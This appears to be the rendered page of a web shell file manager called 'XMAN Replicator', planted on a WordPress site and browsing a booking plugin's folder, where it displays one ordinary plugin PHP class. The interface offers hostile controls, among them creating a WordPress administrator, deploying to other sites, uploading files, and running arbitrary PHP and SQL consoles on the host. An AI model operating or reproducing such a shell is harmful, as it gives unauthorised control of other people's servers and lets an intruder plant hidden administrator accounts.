🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
home
/
rlinfolily
/
www
/
wp-content
/
plugins
/
dopbsp
/
includes
/
events
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwx---r-x
2015-09-08 18:30
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwx---r-x
2015-09-08 18:32
🔄
🗑️
🗑️📁
⬇️
🔒
class-backend-events.php
994 B
-rw----r--
2015-09-08 18:30
✏️
🔄
🗑️
⬇️
🔒
View: class-backend-events.php
<?php /* * Title : Booking System Pro (WordPress Plugin) * Version : 2.0 * File : includes/events/class-backend-events.php * File Version : 1.0 * Created / Last Modified : 13 October 2014 * Author : Dot on Paper * Copyright : © 2012 Dot on Paper * Website : http://www.dotonpaper.net * Description : Booking System PRO back end events PHP class. */ if (!class_exists('DOPBSPBackEndEvents')){ class DOPBSPBackEndEvents extends DOPBSPBackEnd{ /* * Constructor */ function DOPBSPBackEndEvents(){ } /* * Prints out the events page. * * @return HTML page */ function view(){ global $DOPBSP; $DOPBSP->views->backend_events->template(); } } }
PHP Console
Execute
SQL Console
Execute